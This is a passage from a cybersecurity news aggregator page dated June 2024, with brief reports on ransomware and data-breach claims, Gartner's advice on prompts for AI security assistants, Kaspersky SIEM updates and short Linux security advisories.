since March 2023, collecting roughly $42 million in ransom payments. Initially, Akira's attacks targeted Windows systems. However, the gang has since broadened its tactics to include Linux computers, causing anxiety among international cybersecurity agencies. These cyberattacks show Akira's strategy of targeting a wide range of industries and businesses of all sizes, frequently resulting in major operational interruptions and financial losses. As it stands, the Akira ransomware group's claims against E-T-A Cyberattack are unsubstantiated. The lack of an official response from the company creates a vacuum in the confirmation of these claims. While the company's website is still operational, signaling no immediate disruption, a data breach might have serious consequences, compromising client confidentiality, financial integrity, and employee privacy. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for AI Prompt Engineerin ...

 Cybersecurity News

AI has been a major focus of the Gartner Security and Risk Management Summit in National Harbor, Maryland this week, and the consensus has been that while large language models (LLMs) have so far overpromised and under-delivered, there are still AI threats and defensive use cases that cybersecurity pros need to be   show more ...

aware of. Jeremy D’Hoinne, Gartner Research VP for AI & Cybersecurity, told conference attendees that hacker uses of AI so far include improved phishing and social engineering – with deepfakes a particular concern. But D’Hoinne and Director Analyst Kevin Schmidt agreed in a joint panel that there haven’t been any novel attack technique arising from AI yet, just improvements on existing attack techniques like business email compromise (BEC) or voice scams. AI security tools likewise remain underdeveloped, with AI assistants perhaps the most promising cybersecurity application so far, able to potentially help with patching, mitigations, alerts and interactive threat intelligence. D’Hoinne cautions that the tools should be used as an adjunct to security staffers so they don’t lose their ability to think critically. AI Prompt Engineering for Cybersecurity: Precision Matters Using AI assistants and LLMs for cybersecurity use cases was the focus of a separate presentation by Schmidt, who cautioned that AI prompt engineering needs to be very specific for security uses to overcome the limitations of LLMs, and even then the answer may only get you 70%-80% toward your goal. Outputs need to be validated, and junior staff will require the oversight of senior staff, who will more quickly be able to determine the significance of the output. Schmidt also cautioned that chatbots like ChatGPT should only be used for noncritical data. Schmidt gave examples of good and bad AI security prompts for helping security operations teams. “Create a query in my <name of SIEM> to identify suspicious logins” is too vague, he said. He gave an example of a better way to craft a SIEM query: “Create a detection rule in <name of SIEM> to identify suspicious logins from multiple locations within the last 24 hours. Provide the <SIEM> query language and explain the logic behind it and place the explanations in tabular format.” That prompt should produce something like the following output: [caption id="attachment_75212" align="alignnone" width="300"] SIEM query AI prompt output (source: Gartner)[/caption] Analyzing firewall logs was another example. Schmidt gave the following as an example of an ineffective prompt: “Analyze the firewall logs for any unusual patterns or anomalies.” A better prompt would be: “Analyze the firewall logs from the past 24 hours and identify any unusual patterns or anomalies. Summarize your findings in a report format suitable for a security team briefing.” That produced the following output: [caption id="attachment_75210" align="alignnone" width="300"] Firewall log prompt output (source: Gartner)[/caption] Another example involved XDR tools. Instead of a weak prompt like “Summarize the top two most critical security alerts in a vendor’s XDR,” Schmidt recommended something along these lines: “Summarize the top two most critical security alerts in a vendor’s XDR, including the alert ID, description, severity and affected entities. This will be used for the monthly security review report. Provide the response in tabular form.” That prompt produced the following output: [caption id="attachment_75208" align="alignnone" width="300"] XDR alert prompt output (source: Gartner)[/caption] Other Examples of AI Security Prompts Schmidt gave two more examples of good AI prompts, one on incident investigation and another on web application vulnerabilities. For security incident investigations, an effective prompt might be “Provide a detailed explanation of incident DB2024-001. Include the timeline of events, methods used by the attacker and the impact on the organization. This information is needed for an internal investigation report. Produce the output in tabular form.” That prompt should lead to something like the following output: [caption id="attachment_75206" align="alignnone" width="300"] Incident response AI prompt output (source: Gartner)[/caption] For web application vulnerabilities, Schmidt recommended the following approach: “Identify and list the top five vulnerabilities in our web application that could be exploited by attackers. Provide a brief description of each vulnerability and suggest mitigation steps. This will be used to prioritize our security patching efforts. Produce this in tabular format.” That should produce something like this output: [caption id="attachment_75205" align="alignnone" width="300"] Web application vulnerability prompt output (source: Gartner)[/caption] Tools for AI Security Assistants Schmidt listed some of the GenAI tools that security teams might use, ranging from chatbots to SecOps AI assistants – such as CrowdStrike Charlotte AI, Microsoft Copilot for Security, SentinelOne Purple AI and Splunk AI – and startups such as AirMDR, Crogl, Dropzone and Radiant Security (see Schmidt’s slide below). [caption id="attachment_75202" align="alignnone" width="300"] GenAI tools for possible cybersecurity use (source: Gartner)[/caption]

image for Advance Auto Parts: ...

 Cybersecurity News

Advance Auto Parts, Inc., a significant provider of automobile aftermarket components, has allegedly suffered a massive data breach. A threat actor going by the handle "Sp1d3r" claimed Advance Auto Parts data breach. The threat actor further claims to have stolen three terabytes of data from the company's   show more ...

Snowflake cloud storage. The stolen information is allegedly being sold for US$1.5 million. According to the threat actor, Sp1d3r, post the stolen data includes: 380 million customer profiles, containing names, emails, mobile numbers, phone numbers, addresses, and more. 44 million Loyalty/Gas card numbers, along with customer details. Information on 358,000 employees, though the company currently employs around 68,000 people. This discrepancy suggests the data might include records of former employees. Auto parts and part numbers. 140 million customer orders. Sales history Employment candidate information, including Social Security numbers, driver's license numbers, and demographic details. Transaction tender details. Over 200 tables of various data. The threat actor has specified that a middleman is required to facilitate the sale of the stolen data, and no dealings will be conducted via Telegram. Furthermore, what’s worth noting is that in its post, the threat actor claimed to sell the stolen information of 358,000 employees, despite the fact that the organization now employs approximately 68,000 people. The disparity could be due to old data from former employees and associates. [caption id="attachment_75319" align="aligncenter" width="815"] Source: X[/caption] [caption id="attachment_75320" align="aligncenter" width="346"] Source: X[/caption] To find answers to these doubts and verify the threat actor's claims, The Cyber Express Team reached out to the officials to verify the breach, however, as of writing this news report no response has been received. Therefore, the confirmation or denial of these claims has yet to be verified. Advance Auto Parts operates 4,777 stores and 320 Worldpac branches primarily within the United States, with additional locations in Canada, Puerto Rico, and the U.S. Virgin Islands. The company also serves 1,152 independently owned Carquest branded stores across these locations, as well as in Mexico and various Caribbean islands. Advance Auto Parts Data Breach: Linked to Snowflake Cyberattacks The Advance Auto Parts data breach is part of a recent series of attacks targeting customers of Snowflake, a cloud storage company. These attacks have been ongoing since at least mid-April 2024. Snowflake acknowledged the issue in a statement, informing a limited number of customers who they believe may have been impacted by the attacks. However, Snowflake did not provide specific details about the nature of the cyberattacks or confirm if data had been stolen from customer accounts. This incident follows another significant breach involving Live Nation, the parent company of Ticketmaster. Hackers claimed to have stolen personal details of 560 million customers, and the stolen data was hosted on Snowflake's cloud storage. Live Nation disclosed this breach in a filing to the U.S. Securities and Exchange Commission (SEC), revealing that a criminal actor had offered the company's user data for sale on the dark web. In response to the breach, Snowflake and third-party cybersecurity experts, CrowdStrike and Mandiant, issued a joint statement regarding their ongoing investigation into the targeted threat campaign against some Snowflake customer accounts. They are working diligently to understand the extent of the breach and mitigate its impact. Screenshots shared by the threat actor indicate that the leaked data contains numerous references to 'SNOWFLAKE,' supporting the claim that it was stolen during the recent Snowflake data theft attacks. The full extent of the data breach and its implications for Advance Auto Parts and other companies using Snowflake remains to be seen. With Snowflake's large client base and the significant volume of data they manage, the repercussions could be widespread. Only time will tell how many more companies will disclose their data breaches linked to the recent Snowflake attacks. In the meantime, affected customers and employees are advised to monitor their personal information closely and take necessary precautions to protect their data. Companies utilizing Snowflake's services should stay vigilant and follow cybersecurity best practices to safeguard their data against potential threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Kaspersky SIEM: norm ...

 Business

A security information and event management (SIEM) system cant remain static; its detection logic needs to constantly evolve. The threat landscape is ever-changing, which means you need to keep adding new rules regularly for effective data analysis. Admittedly, the bulk of correlation rules are inevitably fine-tuned   show more ...

by the internal information security team, but having up-to-date rules out of the box is crucial in easing this process. Another important point is that an SIEM system must be capable of adapting to the evolution of the corporate IT infrastructure, and be prepared to use new event sources – each of which often requires a new normalizer (the mechanism for converting data from arbitrary sources to a single format). Were constantly working on this, adding new normalizers and correlation rules to the Kaspersky Unified Monitoring and Analysis Platform. This post details what was added in version 3.0.3. New and refined normalizers In between versions 2.1 and  3.0.3 of the Kaspersky Unified Monitoring and Analysis Platform, we released 99 update packages with new or improved normalizers. These include 63 updates that provide support for new event sources, and 38 that improve existing normalizers by adding support for new event types and making various refinements and fixes. The remaining updates contain continuously enhanced correlation rules, filters, and other usability-oriented resources. Other new additions include normalizers that introduce support for the following event sources: Cisco Prime, for Cisco Prime 3.10 events received through syslog PowerDNS, for processing PowerDNS Authoritative Server 4.5 events received through syslog Microsoft Active Directory Federation Service (AD FS), for processing Microsoft AD FS events. The normalizer provides support for this event source starting with Kaspersky Unified Monitoring and Analysis Platform version 3.0.1 Microsoft Active Directory Domain Service (AD DS), for processing Microsoft AD DS events. The normalizer also provides support for this event source starting with Kaspersky Unified Monitoring and Analysis Platform version 3.0.1 NetApp ([OOTB] NetApp syslog, for processing NetApp ONTAP 9.12 events received through syslog; and [OOTB] NetApp file, for processing NetApp ONTAP 9.12 events stored in a file) RedCheck Desktop, for processing RedCheck Desktop 2.6 logs stored in a file MikroTik networking hardware PostgreSQL DBMS MySQL DBMS VMware ESXi Microsoft 365 In addition, our experts have refined the following normalizers: For Microsoft products: revised the normalizer structure and added support for new products and additional event types For PT NAD: implemented support for events of the current product version For UNIX-like operating systems: implemented support for additional event types For Juniper networking devices: made significant normalizer revisions and optimizations For Citrix NetScaler: implemented support for additional event types Updated correlation rules Weve significantly improved the content of all existing correlation rules in the SOC Content package, while focusing on validating rule logic and refining the rules with inputs from our customers real-life experiences. Weve also improved the quality of the rule descriptions, including incident description rules. Along with updating the Russian-language SOC Content package, weve also released a full-fledged English-language SOC Content package, fully synchronizing its content with the Russian version. From now on, we plan to update the two packages in sync. The platform now offers over 500 rules, along with further essential tools such as active lists, filters, and dictionaries. Correlation rule format Were planning to add markup for existing rules soon in accordance with MITRE ATT&CK® tactics and techniques. This will expand the systems capabilities to visualize the level of protection against all known threats. When choosing avenues for development, we generally align with the MITRE ATT&CK® knowledge base – the de facto industry standard. We also consider feedback from our customers that we get during pilots, integration projects, consulting sessions, or even in emails received by account managers, as well as the experiences of our own SOC – one of the most successful and skilled teams in the industry. How updates are delivered to the SIEM system All the content we develop is distributed through the Kaspersky Update Servers subsystem to shorten delivery times. The subsystem requests updates and notifies of them in automated mode, but lets the operator decide on applying these. This helps administrators receive information about available updates quickly, review the contents of each update, and decide whether to introduce new resources in the infrastructure or update existing ones. The update subsystem significantly expands the capabilities of the Kaspersky Unified Monitoring and Analysis Platform to respond rapidly to changes in the threat landscape and infrastructure. The option to use it without direct internet access ensures that data processed by the SIEM system remains secure and within the perimeter, while users can get the latest system content updates. The complete list of event sources supported in Kaspersky Unified Monitoring and Analysis Platform 3.0.3 is available in the technical support section, where you also can find information about the correlation rules. Of course, our SIEM updates arent limited to new normalizers and detection logic: we recently wrote about UI enhancements and routine automation.

image for Transatlantic Cable ...

 News

Episode 350 of the Kaspersky Transatlantic Cable podcast kicks off with surprising news that whilst Generative AI tools such as ChatGPT and MidJourney are marketed aggressively, theyre not actually that popular with everyday folk – with just 2% of people in the UK saying they use Gen AI in their day. From there talk   show more ...

moves to news regarding two large data breaches, both of which were hit by the same group ShinyHunters.  To wrap up, the team discuss a story around Microsofts India X account, which was recently hacked in order to spread crypto scams. If you liked what you heard, please consider subscribing. AI products like ChatGPT much hyped but not much used Ticketmaster hacked. Breach affects more than half a billion users Santander staff and 30 million customers hacked Microsoft Indias X account hijacked in Roaring Kitty crypto scam

image for Inside Baseball: The ...

 Feed

Inside the baseball team's strategy for building next-gen security operations through zero trust and a raft of future initiatives aiming to safeguard team data, fan info, and the iconic Fenway Park — which, by the way, is now a smart stadium.

 Feed

Ubuntu Security Notice 6814-1 - Xiantong Hou discovered that libvpx did not properly handle certain malformed media files. If an application using libvpx opened a specially crafted file, a remote attacker could cause a denial of service, or possibly execute arbitrary code.

 Feed

Debian Linux Security Advisory 5706-1 - An integer overflow vulnerability in the rar e8 filter was discovered in libarchive, a multi-format archive and compression library, which may result in the execution of arbitrary code if a specially crafted RAR archive is processed.

 Feed

Ubuntu Security Notice 6813-1 - It was discovered that the Hotspot component of OpenJDK 21 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 21 incorrectly performed reverse DNS query under   show more ...

certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.

 Feed

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

 Feed

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

 Feed

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

 Feed

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

 Feed

Debian Linux Security Advisory 5705-1 - A use-after-free was discovered in tinyproxy, a lightweight, non-caching, optionally anonymizing HTTP proxy, which could result in denial of service.

 Feed

Ubuntu Security Notice 6567-2 - USN-6567-1 fixed vulnerabilities QEMU. The fix for CVE-2023-2861 was too restrictive and introduced a behavior change leading to a regression in certain environments. This update fixes the problem. Gaoning Pan and Xingwei Li discovered that QEMU incorrectly handled the USB xHCI   show more ...

controller device. A privileged guest attacker could possibly use this issue to cause QEMU to crash, leading to a denial of service. Various other issues were also addressed.

 Feed

Debian Linux Security Advisory 5704-1 - Multiple security issues were discovered in Pillow, a Python imaging library, which could result in denial of service or the execution of arbitrary code if malformed images are processed.

 Feed

Ubuntu Security Notice 6809-1 - It was discovered that BlueZ could be made to dereference invalid memory. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 22.04 LTS. It was discovered that BlueZ could be made to write out of bounds. If a user were tricked into   show more ...

connecting to a malicious device, an attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

 Feed

Ubuntu Security Notice 6812-1 - It was discovered that the Hotspot component of OpenJDK 17 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 17 incorrectly performed reverse DNS query under   show more ...

certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.

 Feed

Ubuntu Security Notice 6811-1 - It was discovered that the Hotspot component of OpenJDK 11 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 11 incorrectly performed reverse DNS query under   show more ...

certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.

 Feed

Ubuntu Security Notice 6810-1 - It was discovered that the Hotspot component of OpenJDK 8 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. Vladimir Kondratyev discovered that the Hotspot component of OpenJDK 8   show more ...

incorrectly handled address offset calculations in the C1 compiler. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

 Feed

Ubuntu Security Notice 6808-1 - It was discovered that Atril was vulnerable to a path traversal attack. An attacker could possibly use this vulnerability to create arbitrary files on the host filesystem with user privileges.

 Feed

Cybersecurity researchers have discovered a malicious Python package uploaded to the Python Package Index (PyPI) repository that's designed to deliver an information stealer called Lumma (aka LummaC2). The package in question is crytic-compilers, a typosquatted version of a legitimate library named crytic-compile. The rogue package was downloaded 441 times before it was taken down by PyPI

 Feed

Google has announced plans to store Maps Timeline data locally on users' devices instead of their Google account effective December 1, 2024. The changes were originally announced by the tech giant in December 2023, alongside changes to the auto-delete control when enabling Location History by setting it to three months by default, down from the previous limit of 18 months. Google Maps Timeline,

 Feed

Learn about critical threats that can impact your organization and the bad actors behind them from Cybersixgill’s threat experts. Each story shines a light on underground activities, the threat actors involved, and why you should care, along with what you can do to mitigate risk.  In an increasingly interconnected world, supply chain attacks have emerged as a formidable threat, compromising

 Feed

Tom works for a reputable financial institution. He has a long, complex password that would be near-impossible to guess. He’s memorized it by heart, so he started using it for his social media accounts and on his personal devices too. Unbeknownst to Tom, one of these sites has had its password database compromised by hackers and put it up for sale on the dark web. Now threat actors are working

 Feed

Threat actors are increasingly abusing legitimate and commercially available packer software such as BoxedApp to evade detection and distribute malware such as remote access trojans and information stealers. "The majority of the attributed malicious samples targeted financial institutions and government industries," Check Point security researcher Jiri Vinopal said in an analysis. The volume of

 Feed

The distributed denial-of-service (DDoS) botnet known as Muhstik has been observed leveraging a now-patched security flaw impacting Apache RocketMQ to co-opt susceptible servers and expand its scale. "Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial

 Google

Drones, some coloured cardboard, and a piece of tinfoil may be all the kit you need to crash a robot-driven taxi, and a rapper is accused of using Justin Bieber's name to defraud a TV company. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

2024-06
Aggregator history
Thursday, June 06
SAT
SUN
MON
TUE
WED
THU
FRI
JuneJulyAugust